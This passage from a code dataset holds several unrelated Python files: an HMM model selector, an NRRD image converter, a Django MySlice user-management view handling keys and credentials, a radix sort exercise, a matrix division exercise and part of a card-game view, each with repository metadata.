None\n\n for numComponents in range(self.min_n_components, self.max_n_components + 1):\n try:\n if self.verbose:\n print(\"\\n\\n WORKING FOR WORD {} FOR {} STATES IN HMM\".format(self.this_word, numComponents))\n print(\" {} WITH {} SEQUENCES, NUMBER OF FOLDS CHOSEN {}\".format(self.this_word, len(self.sequences),min(3, len(self.sequences))))\n\n split_method = KFold(n_splits=min(3, len(self.sequences)))\n # resetting collection of scores\n scores = []\n numFold = 0\n\n # splitting in training and test sets\n for cv_train_idx, cv_test_idx in split_method.split(self.sequences):\n numFold += 1\n if self.verbose:\n print(\" Fold number {} \".format(numFold))\n #### TRAINING ####\n # get fold for training\n self.X, self.lengths = combine_sequences(cv_train_idx, self.sequences)\n # train\n model = self.base_model(numComponents)\n ### restoring X and lengths after training\n self.X, self.lengths = self.hwords[self.this_word]\n\n #### SCORING ####\n # get fold for testing\n __x, __length = combine_sequences(cv_test_idx, self.sequences)\n # score\n logl = model.score(__x, __length)\n scores.append(logl)\n if self.verbose:\n print(\" score {} \".format(logl))\n # getting the mean of the fold scores\n score = np.mean(scores)\n if self.verbose:\n print(\" Average score {} \".format(score))\n\n\n if score > maxScore:\n maxScore = score\n maxModel = model\n if self.verbose:\n print(\" {} components with bigger score until now (the bigger the better)\".format(numComponents))\n except:\n if self.verbose:\n print(\" FAIL TRAINING FOR {} COMPONENTS IN HMM\".format(numComponents))\n break\n return maxModel\n\n","repo_name":"dougbel/AIND_04SignLenguageRecognizer","sub_path":"my_model_selectors.py","file_name":"my_model_selectors.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"69967629682","text":"import SimpleITK as sitk\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport os\nimport json\n\nfrom consts import SRC_ROOT, SEGMENTED_STRUCTURE, DST_ROOT, 
REGION_DATA_FILE, SEPARATE_SAMPLES, IMG_FORMAT\n\ndef getImgFileName(img_prefix, i):\n return f\"{img_prefix}_{i:03d}{IMG_FORMAT}\"\n\ndef convertToJPG(srcFile, dstFolder, img_prefix):\n image = sitk.ReadImage(srcFile)\n image_array = sitk.GetArrayFromImage(image)\n\n if not os.path.exists(dstFolder):\n os.makedirs(dstFolder)\n\n for i in range(image_array.shape[0]):\n imgFile = getImgFileName(img_prefix, i)\n cv2.imwrite(os.path.join(dstFolder,imgFile), image_array[i, :, :])\n\ndef plotImage(image,contours):\n plt.imshow(image, cmap='gray', vmin=0, vmax=255 )\n\n for contour in contours:\n xs = [v[0][0] for v in contour]\n ys = [v[0][1] for v in contour]\n plt.plot(xs,ys,linewidth=1)\n plt.show()\n \ndef getRegionsObject(contours):\n cnt = 0\n result = {}\n for contour in contours:\n xs = [v[0][0] for v in contour]\n ys = [v[0][1] for v in contour]\n\n result[str(cnt)] = {\n 'shape_attributes': {\n 'name': \"polygon\",\n 'all_points_x': np.array(xs).tolist(),\n 'all_points_y': np.array(ys).tolist()\n },\n 'region_attributes': {}\n }\n cnt += 1\n return result\n \n\ndef dumpRegionData(srcFile, dstFolder, img_prefix):\n image = sitk.ReadImage(srcFile)\n image_array = sitk.GetArrayFromImage(image)\n\n if not os.path.exists(dstFolder):\n os.makedirs(dstFolder)\n\n jsonFilePath = os.path.join(dstFolder, REGION_DATA_FILE)\n \n if SEPARATE_SAMPLES:\n jsonObject = {}\n else: \n try:\n with open(jsonFilePath, \"r\") as file:\n jsonObject = json.load(file)\n except FileNotFoundError:\n jsonObject = {}\n\n for i in range(image_array.shape[0]):\n contours, _ = cv2.findContours(image_array[i, :, :], cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n\n imgFile = getImgFileName(img_prefix, i)\n imgFilePath = os.path.join(dstFolder,imgFile)\n imgFileSize = os.path.getsize(imgFilePath)\n\n jsonObject[f\"{imgFile}{imgFileSize}\"] = {\n 'fileref': \"\",\n 'size': imgFileSize,\n 'filename': imgFile,\n 'base64_img_data': \"\",\n 'file_attributes': {},\n 'regions': getRegionsObject(contours)\n }\n\n # optionally, the slices with the overlaid contours (if any) can be displayed\n # note: this slows processing down considerably\n #plotImage(cv2.imread(imgFilePath,cv2.IMREAD_GRAYSCALE),contours)\n\n with open(jsonFilePath, \"w\") as file:\n json.dump(jsonObject, file)#, indent=2)\n \n\ndef processSample(sample):\n srcFile = os.path.join(SRC_ROOT, sample, \"img.nrrd\")\n mandibleFile = os.path.join(SRC_ROOT, sample, \"structures\", SEGMENTED_STRUCTURE+\".nrrd\")\n\n # process only those models in which the mandible has been segmented\n if os.path.exists(srcFile) and os.path.exists(mandibleFile):\n if SEPARATE_SAMPLES:\n dstDir = os.path.join(DST_ROOT, sample)\n else:\n dstDir = DST_ROOT\n \n img_prefix = f\"img{sample}\"\n\n convertToJPG(srcFile, dstDir, img_prefix)\n dumpRegionData(mandibleFile, dstDir, img_prefix)\n \n \ndef main():\n if not SEPARATE_SAMPLES:\n try:\n os.remove(os.path.join(DST_ROOT, REGION_DATA_FILE))\n except FileNotFoundError:\n pass\n\n for (dirpath, dirnames, filenames) in os.walk(SRC_ROOT):\n for sample in dirnames: # [0:3]:\n processSample(sample)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pojdulos/readNRRD","sub_path":"readNRRD.py","file_name":"readNRRD.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"72906270963","text":"import os\nimport re\nimport itertools\nimport json\n\nfrom unfold.loginrequired import LoginRequiredAutoLogoutView\n\nfrom manifold.core.query import Query\nfrom 
manifoldapi.manifoldapi import execute_query, execute_admin_query\nfrom portal.actions import manifold_update_user, manifold_update_account, manifold_add_account, manifold_delete_account\nfrom portal.actions import (\n sfa_update_user, authority_get_pis, authority_add_pis,\n authority_remove_pis,authority_check_pis ,clear_user_creds )\n\nfrom unfold.page import Page \nfrom ui.topmenu import topmenu_items_live, the_user\n\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom myslice.theme import ThemeView\n\n# requires login\nclass UserView(LoginRequiredAutoLogoutView, ThemeView):\n template_name = \"manageuserview.html\"\n def dispatch(self, *args, **kwargs):\n return super(UserView, self).dispatch(*args, **kwargs)\n\n\n def get_context_data(self, **kwargs):\n\n page = Page(self.request)\n page.add_js_files ( [ \"js/jquery.validate.js\", \"js/my_account.register.js\", \"js/my_account.edit_profile.js\", \"js/jquery-ui.js\" ] )\n page.add_css_files ( [ \"css/onelab.css\", \"css/account_view.css\",\"css/plugin.css\",\"css/jquery-ui.css\" ] )\n\n for key, value in kwargs.iteritems():\n if key == \"email\":\n selected_email=value\n \n user_query = Query().get('local:user').filter_by('email', '==', selected_email).select('user_id','config','email','status')\n user_details = execute_admin_query(self.request, user_query)\n \n # not always found in user_details...\n config={}\n for user_detail in user_details:\n user_id = user_detail['user_id']\n user_email = user_detail['email'] \n # different significations of user_status\n if user_detail['status'] == 0: \n user_status = 'Disabled'\n elif user_detail['status'] == 1:\n user_status = 'Validation Pending'\n elif user_detail['status'] == 2:\n user_status = 'Enabled'\n else:\n user_status = 'N/A'\n #email = user_detail['email']\n if user_detail['config']:\n config = json.loads(user_detail['config'])\n authority_hrn = config.get('authority','Unknown Authority')\n \n\n platform_query = Query().get('local:platform').select('platform_id','platform','gateway_type','disabled')\n account_query = Query().get('local:account').filter_by('user_id', '==', user_id).select('user_id','platform_id','auth_type','config')\n platform_details = execute_query(self.request, platform_query)\n account_details = execute_admin_query(self.request, account_query)\n \n # initial assignment needed for users having account.config = {} \n platform_name = ''\n account_type = ''\n account_usr_hrn = ''\n account_pub_key = ''\n account_priv_key = ''\n account_reference = ''\n my_users = ''\n my_slices = ''\n my_auths = ''\n ref_acc_list = ''\n principal_acc_list = ''\n user_status_list = []\n platform_name_list = []\n platform_name_secondary_list = []\n platform_access_list = []\n platform_no_access_list = []\n total_platform_list = []\n account_type_list = []\n account_type_secondary_list = []\n account_reference_list = []\n delegation_type_list = []\n user_cred_exp_list = []\n slice_list = []\n auth_list = []\n slice_cred_exp_list = []\n auth_cred_exp_list = []\n usr_hrn_list = []\n pub_key_list = []\n \n for platform_detail in platform_details:\n if 'sfa' in platform_detail['gateway_type']:\n total_platform = platform_detail['platform']\n total_platform_list.append(total_platform)\n \n for account_detail in account_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n platform_name = platform_detail['platform']\n if 'config' in account_detail and 
account_detail['config'] is not '':\n account_config = json.loads(account_detail['config'])\n account_usr_hrn = account_config.get('user_hrn','N/A')\n account_pub_key = account_config.get('user_public_key','N/A')\n account_reference = account_config.get ('reference_platform','N/A')\n\n # credentials of myslice platform\n if 'myslice' in platform_detail['platform']:\n acc_user_cred = account_config.get('delegated_user_credential','N/A')\n acc_slice_cred = account_config.get('delegated_slice_credentials','N/A')\n acc_auth_cred = account_config.get('delegated_authority_credentials','N/A')\n #usr_hrn of myslice platform. used to check pi or no\n account_usr_hrn_myslice = account_config.get('user_hrn','N/A')\n\n\n if 'N/A' not in acc_user_cred:\n exp_date = re.search('(.*)', acc_user_cred)\n if exp_date:\n user_exp_date = exp_date.group(1)\n user_cred_exp_list.append(user_exp_date)\n\n my_users = [{'cred_exp': t[0]}\n for t in zip(user_cred_exp_list)]\n \n\n if 'N/A' not in acc_slice_cred:\n for key, value in acc_slice_cred.iteritems():\n slice_list.append(key)\n # get cred_exp date\n exp_date = re.search('(.*)', value)\n if exp_date:\n exp_date = exp_date.group(1)\n slice_cred_exp_list.append(exp_date)\n\n my_slices = [{'slice_name': t[0], 'cred_exp': t[1]}\n for t in zip(slice_list, slice_cred_exp_list)]\n\n if 'N/A' not in acc_auth_cred:\n for key, value in acc_auth_cred.iteritems():\n auth_list.append(key)\n #get cred_exp date\n exp_date = re.search('(.*)', value)\n if exp_date:\n exp_date = exp_date.group(1)\n auth_cred_exp_list.append(exp_date)\n\n my_auths = [{'auth_name': t[0], 'cred_exp': t[1]}\n for t in zip(auth_list, auth_cred_exp_list)]\n \n # for reference accounts\n if 'reference' in account_detail['auth_type']:\n account_type = 'Reference'\n delegation = 'N/A'\n platform_name_secondary_list.append(platform_name)\n account_type_secondary_list.append(account_type)\n account_reference_list.append(account_reference)\n ref_acc_list = [{'platform_name': t[0], 'account_type': t[1], 'account_reference': t[2]} \n for t in zip(platform_name_secondary_list, account_type_secondary_list, account_reference_list)]\n \n elif 'managed' in account_detail['auth_type']:\n account_type = 'Principal'\n delegation = 'Automatic'\n else:\n account_type = 'Principal'\n delegation = 'Manual'\n # for principal (auth_type=user/managed) accounts\n if 'reference' not in account_detail['auth_type']:\n platform_name_list.append(platform_name)\n account_type_list.append(account_type)\n delegation_type_list.append(delegation)\n usr_hrn_list.append(account_usr_hrn)\n pub_key_list.append(account_pub_key)\n user_status_list.append(user_status)\n # combining 5 lists into 1 [to render in the template] \n principal_acc_list = [{'platform_name': t[0], 'account_type': t[1], 'delegation_type': t[2], 'usr_hrn':t[3], 'usr_pubkey':t[4], 'user_status':t[5],} \n for t in zip(platform_name_list, account_type_list, delegation_type_list, usr_hrn_list, pub_key_list, user_status_list)]\n # to hide private key row if it doesn't exist \n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n account_priv_key = account_config.get('user_private_key','N/A')\n if 'sfa' in platform_detail['gateway_type']:\n platform_access = platform_detail['platform']\n platform_access_list.append(platform_access)\n \n # Removing the platform which already has access\n for platform in platform_access_list:\n total_platform_list.remove(platform)\n # we could use zip. 
this one is used if columns have unequal rows \n platform_list = [{'platform_no_access': t[0]}\n for t in itertools.izip_longest(total_platform_list)]\n\n ## check whether the user is a PI\n pi_status = self.request.session['user']['pi']\n\n context = super(UserView, self).get_context_data(**kwargs)\n context['principal_acc'] = principal_acc_list\n context['ref_acc'] = ref_acc_list\n context['platform_list'] = platform_list\n context['my_users'] = my_users\n context['my_slices'] = my_slices\n context['my_auths'] = my_auths\n context['user_status'] = user_status\n context['user_email'] = user_email\n context['firstname'] = config.get('firstname',\"?\")\n context['lastname'] = config.get('lastname',\"?\")\n context['fullname'] = context['firstname'] +' '+ context['lastname']\n context['authority'] = config.get('authority',\"Unknown Authority\")\n context['user_private_key'] = account_priv_key\n context['pi'] = pi_status\n \n # XXX This is repeated in all pages\n # more general variables expected in the template\n context['title'] = 'Platforms connected to MySlice'\n # the menu items on the top\n context['topmenu_items'] = topmenu_items_live('My Account', page)\n # so we can show who is logged in\n context['username'] = the_user(self.request)\n context['theme'] = self.theme\n# context ['firstname'] = config['firstname']\n prelude_env = page.prelude_env()\n context.update(prelude_env)\n return context\n\n\n@login_required\n# my_acc form value processing\ndef user_process(request, **kwargs):\n \n for key, value in kwargs.iteritems():\n if key == \"email\":\n selected_email=value\n\n redirect_url = \"/portal/user/\"+selected_email\n \n user_query = Query().get('local:user').filter_by('email', '==', selected_email).select('user_id','email','password','config')\n user_details = execute_admin_query(request, user_query)\n\n # getting the user_id and email from the query results\n for user_detail in user_details:\n user_id = user_detail['user_id']\n user_email = user_detail['email']\n\n account_query = Query().get('local:account').filter_by('user_id', '==', user_id).select('user_id','platform_id','auth_type','config')\n account_details = execute_admin_query(request, account_query)\n\n platform_query = Query().get('local:platform').select('platform_id','platform')\n platform_details = execute_admin_query(request, platform_query)\n \n\n for account_detail in account_details:\n for platform_detail in platform_details:\n # Add reference account to the platforms\n if 'add_'+platform_detail['platform'] in request.POST:\n platform_id = platform_detail['platform_id']\n user_params = {'platform_id': platform_id, 'user_id': user_id, 'auth_type': \"reference\", 'config': '{\"reference_platform\": \"myslice\"}'}\n manifold_add_account(request, user_params)\n messages.info(request, 'Reference Account is added to the selected platform successfully!')\n return HttpResponseRedirect(redirect_url)\n\n # Delete reference account from the platforms\n if 'delete_'+platform_detail['platform'] in request.POST:\n platform_id = platform_detail['platform_id']\n user_params = {'user_id':user_id}\n manifold_delete_account(request, platform_id, user_id, user_params)\n messages.info(request, 'Reference Account is removed from the selected platform')\n return HttpResponseRedirect(redirect_url)\n\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n acc_slice_cred = account_config.get('delegated_slice_credentials','N/A')\n acc_auth_cred = 
account_config.get('delegated_authority_credentials','N/A')\n \n # adding the slices and corresponding credentials to list\n if 'N/A' not in acc_slice_cred:\n slice_list = []\n slice_cred = [] \n for key, value in acc_slice_cred.iteritems():\n slice_list.append(key) \n slice_cred.append(value)\n # special case: download each slice credential separately \n for i in range(0, len(slice_list)):\n if 'dl_'+slice_list[i] in request.POST:\n slice_detail = \"Slice name: \" + slice_list[i] +\"\\nSlice Credentials: \\n\"+ slice_cred[i]\n response = HttpResponse(slice_detail, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"slice_credential.txt\"'\n return response\n\n # adding the authority and corresponding credentials to list\n if 'N/A' not in acc_auth_cred:\n auth_list = []\n auth_cred = [] \n for key, value in acc_auth_cred.iteritems():\n auth_list.append(key) \n auth_cred.append(value)\n # special case: download each authority credential separately\n for i in range(0, len(auth_list)):\n if 'dl_'+auth_list[i] in request.POST:\n auth_detail = \"Authority: \" + auth_list[i] +\"\\nAuthority Credentials: \\n\"+ auth_cred[i]\n response = HttpResponse(auth_detail, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"auth_credential.txt\"'\n return response\n\n if 'submit_name' in request.POST:\n edited_first_name = request.POST['fname']\n edited_last_name = request.POST['lname']\n \n config={}\n for user_config in user_details:\n if user_config['config']:\n config = json.loads(user_config['config'])\n config['firstname'] = edited_first_name\n config['lastname'] = edited_last_name\n config['authority'] = config.get('authority','Unknown Authority')\n updated_config = json.dumps(config)\n user_params = {'config': updated_config}\n else: # it's needed if the config is empty \n user_config['config']= '{\"firstname\":\"' + edited_first_name + '\", \"lastname\":\"'+ edited_last_name + '\", \"authority\": \"Unknown Authority\"}'\n user_params = {'config': user_config['config']} \n # updating config local:user in manifold \n manifold_update_user(request, user_email, user_params)\n # this will be deprecated, we will show the success msg in same page\n # Redirect to same page with success message\n messages.success(request, 'Success: First Name and Last Name Updated.')\n return HttpResponseRedirect(redirect_url) \n \n elif 'submit_auth' in request.POST:\n edited_auth = request.POST['authority']\n \n config={}\n for user_config in user_details:\n if user_config['config']:\n config = json.loads(user_config['config'])\n config['firstname'] = config.get('firstname', 'N/A')\n config['lastname'] = config.get('lastname','N/A')\n config['authority'] = edited_auth\n updated_config = json.dumps(config)\n user_params = {'config': updated_config}\n else: # it's needed if the config is empty \n user_config['config']= '{\"firstname\": \"N/A\", \"lastname\":\"N/A\", \"authority\":\"' + edited_auth + '\"}'\n user_params = {'config': user_config['config']}\n # updating config local:user in manifold \n manifold_update_user(request, user_email, user_params)\n # this will be deprecated, we will show the success msg in same page\n # Redirect to same page with success message\n messages.success(request, 'Success: Authority Updated.')\n return HttpResponseRedirect(redirect_url)\n\n# XXX TODO: Factorize with portal/registrationview.py\n\n elif 'generate' in request.POST:\n for account_detail in account_details:\n for platform_detail in platform_details:\n if 
platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n from Crypto.PublicKey import RSA\n private = RSA.generate(1024)\n private_key = json.dumps(private.exportKey())\n public = private.publickey()\n public_key = json.dumps(public.exportKey(format='OpenSSH'))\n # updating manifold local:account table\n account_config = json.loads(account_detail['config'])\n # preserving user_hrn\n user_hrn = account_config.get('user_hrn','N/A')\n keypair = '{\"user_public_key\":'+ public_key + ', \"user_private_key\":'+ private_key + ', \"user_hrn\":\"'+ user_hrn + '\"}'\n updated_config = json.dumps(account_config) \n # updating manifold\n user_params = { 'config': keypair, 'auth_type':'managed'}\n manifold_update_account(request, user_id, user_params)\n # updating sfa\n #public_key = public_key.replace('\"', '');\n #user_pub_key = {'keys': public_key}\n #sfa_update_user(request, user_hrn, user_pub_key)\n messages.success(request, 'Success: New Keypair Generated! Delegation of your credentials will be automatic.')\n return HttpResponseRedirect(redirect_url)\n else:\n messages.error(request, 'Account error: You need an account in myslice platform to perform this action')\n return HttpResponseRedirect(redirect_url)\n \n elif 'upload_key' in request.POST:\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n up_file = request.FILES['pubkey']\n file_content = up_file.read()\n file_name = up_file.name\n file_extension = os.path.splitext(file_name)[1] \n allowed_extension = ['.pub','.txt']\n if file_extension in allowed_extension and re.search(r'ssh-rsa',file_content):\n account_config = json.loads(account_detail['config'])\n # preserving user_hrn\n user_hrn = account_config.get('user_hrn','N/A')\n file_content = '{\"user_public_key\":\"'+ file_content + '\", \"user_hrn\":\"'+ user_hrn +'\"}'\n #file_content = re.sub(\"\\r\", \"\", file_content)\n #file_content = re.sub(\"\\n\", \"\\\\n\",file_content)\n file_content = ''.join(file_content.split())\n #update manifold local:account table\n user_params = { 'config': file_content, 'auth_type':'user'}\n manifold_update_account(request,user_id,user_params)\n # updating sfa\n #user_pub_key = {'keys': file_content}\n #sfa_update_user(request, user_hrn, user_pub_key)\n messages.success(request, 'Public key uploaded! 
Please delegate your credentials using SFA: http://trac.myslice.info/wiki/DelegatingCredentials')\n return HttpResponseRedirect(redirect_url)\n else:\n messages.error(request, 'RSA key error: Please upload a valid RSA public key [.txt or .pub].')\n return HttpResponseRedirect(redirect_url)\n else:\n messages.error(request, 'Account error: You need an account in myslice platform to perform this action')\n return HttpResponseRedirect(redirect_url)\n\n elif 'dl_pubkey' in request.POST:\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n public_key = account_config['user_public_key'] \n response = HttpResponse(public_key, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"pubkey.txt\"'\n return response\n break\n else:\n messages.error(request, 'Account error: You need an account in myslice platform to perform this action')\n return HttpResponseRedirect(redirect_url)\n \n elif 'dl_pkey' in request.POST:\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n if 'user_private_key' in account_config:\n private_key = account_config['user_private_key']\n response = HttpResponse(private_key, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"privkey.txt\"'\n return response\n else:\n messages.error(request, 'Download error: Private key is not stored in the server')\n return HttpResponseRedirect(redirect_url)\n\n else:\n messages.error(request, 'Account error: You need an account in myslice platform to perform this action')\n return HttpResponseRedirect(redirect_url)\n \n# elif 'delete' in request.POST:\n# for account_detail in account_details:\n# for platform_detail in platform_details:\n# if platform_detail['platform_id'] == account_detail['platform_id']:\n# if 'myslice' in platform_detail['platform']:\n# account_config = json.loads(account_detail['config'])\n# if 'user_private_key' in account_config:\n# for key in account_config.keys():\n# if key == 'user_private_key': \n# del account_config[key]\n# \n# updated_config = json.dumps(account_config)\n# user_params = { 'config': updated_config, 'auth_type':'user'}\n# manifold_update_account(request,user_params)\n# messages.success(request, 'Private Key deleted. 
You need to delegate credentials manually once it expires.')\n# messages.success(request, 'Once your credentials expire, Please delegate manually using SFA: http://trac.myslice.info/wiki/DelegatingCredentials')\n# return HttpResponseRedirect(\"/portal/account/\")\n# else:\n# messages.error(request, 'Delete error: Private key is not stored in the server')\n# return HttpResponseRedirect(redirect_url)\n# \n# else:\n# messages.error(request, 'Account error: You need an account in myslice platform to perform this action') \n# return HttpResponseRedirect(redirect_url)\n\n #clear all creds\n elif 'clear_cred' in request.POST:\n clear_user_creds(request, user_email)\n messages.success(request, 'All Credentials cleared')\n return HttpResponseRedirect(redirect_url)\n\n #make a user PI\n elif 'makepi' in request.POST:\n # getting user's authority_hrn\n config={}\n for user_config in user_details:\n if user_config['config']:\n user_config = json.loads(user_config['config'])\n authority_hrn = user_config.get('authority','Unknown Authority')\n\n #getting user_hrn\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n user_hrn = account_config.get('user_hrn','N/A')\n \n authority_add_pis(request, authority_hrn, user_hrn)\n clear_user_creds(request, user_email)\n messages.success(request, 'User upgraded to PI')\n return HttpResponseRedirect(redirect_url)\n\n elif 'removepi' in request.POST:\n # getting user's authority_hrn\n config={}\n for user_config in user_details:\n if user_config['config']:\n user_config = json.loads(user_config['config'])\n authority_hrn = user_config.get('authority','Unknown Authority')\n #getting user_hrn\n for account_detail in account_details:\n for platform_detail in platform_details:\n if platform_detail['platform_id'] == account_detail['platform_id']:\n if 'myslice' in platform_detail['platform']:\n account_config = json.loads(account_detail['config'])\n user_hrn = account_config.get('user_hrn','N/A')\n authority_remove_pis(request, authority_hrn, user_hrn)\n clear_user_creds(request, user_email)\n messages.success(request, 'PI downgraded to user')\n return HttpResponseRedirect(redirect_url)\n \n\n\n # Download delegated_user_cred\n elif 'dl_user_cred' in request.POST:\n if 'delegated_user_credential' in account_config:\n user_cred = account_config['delegated_user_credential']\n response = HttpResponse(user_cred, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"user_cred.txt\"'\n return response\n else:\n messages.error(request, 'Download error: User credential is not stored in the server')\n return HttpResponseRedirect(redirect_url)\n \n else:\n messages.info(request, 'Under Construction. Please try again later!')\n return HttpResponseRedirect(redirect_url)\n\n\n","repo_name":"onelab-eu/myslice","sub_path":"portal/manageuserview.py","file_name":"manageuserview.py","file_ext":"py","file_size_in_byte":29252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16479880830","text":"import datetime\nimport json\nimport logging\nimport os\nimport sys\nimport time\n\nif os.environ.get(\"APPLICATION_PATH\") is None:\n APPLICATION_PATH = \"/app\"\nelse:\n APPLICATION_PATH = os.environ.get('APPLICATION_PATH')\n\npaypal_footer = \"\"\"\n
\n
\n \n \n \n \n \"\"\n
\n Le service est gratuit, mais si tu souhaites soutenir le projet (serveur & domaine).\n
\n\"\"\"\n\n\ndef daterange(start_date, end_date):\n for n in range(int((end_date - start_date).days)):\n yield start_date + datetime.timedelta(n)\n\n\ndef str2bool(v):\n if type(v) != bool:\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n else:\n return v\n\n\ndef is_float(element):\n try:\n float(element)\n return True\n except ValueError:\n return False\n\n\ndef reformat_json(yaml):\n result = {}\n for key, value in yaml.items():\n if value in [\"true\", \"false\"]:\n result[key] = str2bool(value)\n elif type(value) == dict:\n result[key] = value\n elif not isinstance(value, bool) and is_float(value):\n result[key] = float(value)\n else:\n result[key] = value\n return result","repo_name":"lezante/myelectricaldata","sub_path":"app/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"36403903758","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n self.previous = None\n\nclass LinkedList :\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n def __str__(self):\n if self.isEmpty():\n return \"Empty\"\n cur, s = self.head, str(self.head.value) + \" \"\n while cur.next != None:\n s += str(cur.next.value) + \" \"\n cur = cur.next\n return s\n\n def __getitem__(self,index) :\n cur = self.head\n for _ in range(index) :\n cur = cur.next\n return cur.value\n\n def print(self) :\n if self.isEmpty():\n return \"Empty\"\n cur, s = self.head, str(self.head.value)\n while cur.next != None:\n s += \" -> \" + str(cur.next.value) \n cur = cur.next\n return s\n\n def isEmpty(self):\n return self.head == None\n\n def addHead(self, item):\n new = Node(item)\n if self.isEmpty() :\n self.head = new\n self.tail = new\n else :\n current = self.head\n new.next = self.head\n current.previous = new\n self.head = new\n while current.next != None :\n current = current.next\n self.tail = current\n\n def append(self, item):\n new = Node(item)\n if self.isEmpty() :\n self.head = new\n self.tail = new\n else :\n current = self.head\n while current.next != None :\n current = current.next\n current.next = new\n new.previous = self.tail\n self.tail = new\n\n def insert(self, pos, item):\n p = Node(item)\n if int(pos) == 0 :\n p.next = self.head\n self.head = p\n else :\n q = self.head\n for _ in range(int(pos)-1) :\n q = q.next\n p.next = q.next\n q.next = p\n\n\n def index(self, item):\n n = 0\n if self.isEmpty() :\n return -1\n else :\n current = self.head\n while current :\n if str(current.value) == str(item) :\n return n\n else :\n current = current.next\n n += 1\n return -1\n\n def size(self):\n current = self.head\n n = 0\n while current :\n current = current.next\n n += 1\n return n\n\n def deQueue(self) :\n cur = self.head\n q = self.head.value\n if cur.next == None:\n self.head = None\n else:\n self.head = cur.next\n return q\n\n def pop(self):\n current = self.head\n if current.next == None :\n self.head = None\n self.tail = None\n else :\n self.head = current.next\n\ndef radix_sort(input) :\n L = LinkedList()\n for i in input :\n L.append(i)\n\n LL = LinkedList()\n for _ in range(10) :\n LL.append(LinkedList())\n\n round = 1\n while 1 :\n while not L.isEmpty() :\n num = L.deQueue()\n index_digit = get_digit(abs(int(num)),round)\n if LL[index_digit].isEmpty() :\n LL[index_digit].append(num)\n else:\n for i in range(LL[index_digit].size()) :\n if int(LL[index_digit][i]) <= int(num) :\n LL[index_digit].insert(i,num)\n 
break\n else :\n if i == LL[index_digit].size()-1 :\n LL[index_digit].append(num)\n else :\n continue\n print(\"Round :\",round)\n for j in range(0,10) :\n print(j,\": \",end='')\n if LL[j].isEmpty() :\n print(\"\")\n else :\n print(LL[j])\n print(\"------------------------------------------------------------\")\n done = True\n for i in range(1,10) :\n if not LL[i].isEmpty() :\n done = False\n for i in range (10) :\n while not LL[i].isEmpty() :\n L.append(LL[i].deQueue())\n if done :\n return L,round-1\n round += 1\n return L,round-2\n\n\ndef get_digit(n, d):\n for _ in range(d-1):\n n //= 10\n return n % 10\n\ninput = input(\"Enter Input : \").split(\" \")\nbefore = LinkedList()\nfor i in input :\n before.append(i)\nprint(\"------------------------------------------------------------\")\nafter, time = radix_sort(input)\nprint(time,\"Time(s)\")\nprint(f'Before Radix Sort : {before.print()}')\nprint(f'After Radix Sort : {after.print()}')","repo_name":"ThitarThitaporn/OOD_Program","sub_path":"4linkedList/5radixSort.py","file_name":"5radixSort.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"390318178","text":"#!/usr/bin/python3\ndef matrix_divided(matrix, div):\n new_matrix = []\n new_row = []\n\n for row in matrix:\n for num in row:\n if not isinstance(num, (int, float)):\n raise TypeError('matrix must be a matrix (list of lists) of integers/floats')\n if len(row) != len(matrix[0]):\n raise TypeError('Each row of the matrix must have the same size')\n if not isinstance(div, (int, float)):\n raise TypeError('div must be a number')\n if div is 0:\n raise ZeroDivisionError('division by zero')\n\n for row in matrix:\n for num in row:\n num = num / div\n num = round(num, 2)\n new_row.append(num)\n new_matrix.append(new_row)\n\n return new_matrix\n","repo_name":"tlvb25/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12940031824","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom .forms import GameForm\nfrom .models import GameResult\n\n\nclass GameView(View):\n form_class = GameForm\n template_name = 'test_game.html'\n\n def get(self, request):\n return render(request, self.template_name)\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n board = ' '.join(board for board in request.POST.get('board', '')).split(' ')\n cards = request.POST.get('cards', '')\n cards = 